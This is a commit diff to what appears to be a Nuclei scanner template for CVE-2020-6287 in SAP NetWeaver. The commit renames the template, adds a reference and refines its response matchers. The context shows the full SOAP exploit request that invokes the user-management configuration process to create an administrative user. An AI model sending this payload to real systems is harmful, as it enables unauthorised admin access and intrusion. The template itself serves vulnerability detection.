Improved matchers for CVE-2020-6287

2021-06-05 10:29:59 +05:30 · 2021-06-05 10:29:59 +05:30 · 55c0e1b103
parent 91b33eb6a5
commit 55c0e1b103
1 changed files with 8 additions and 2 deletions
--- a/cves/2020/CVE-2020-6287.yaml
+++ b/cves/2020/CVE-2020-6287.yaml
@ -1,7 +1,7 @@
 id: CVE-2020-6287

 info:
-  name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
+  name: Remotely Exploitable Code On NetWeaver
  author: dwisiswant0
  severity: critical
  tags: cve,cve2020,sap
@ -11,6 +11,7 @@ info:
    - https://launchpad.support.sap.com/#/notes/2934135
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
    - https://www.onapsis.com/recon-sap-cyber-security-vulnerability
+    - https://github.com/chipik/SAP_RECON

 requests:
  - payloads:
@ -23,12 +24,16 @@ requests:
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
+
    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "urn:CTCWebServiceSi"
+          - "CTCWebServiceSi"
+          - "SOAP-ENV"
        part: body
+        condition: and
+
      - type: status
        status:
          - 200
@ -36,4 +41,5 @@ requests:
      - type: word
        words:
          - "text/xml"
+          - "SAP NetWeaver Application Server"
        part: header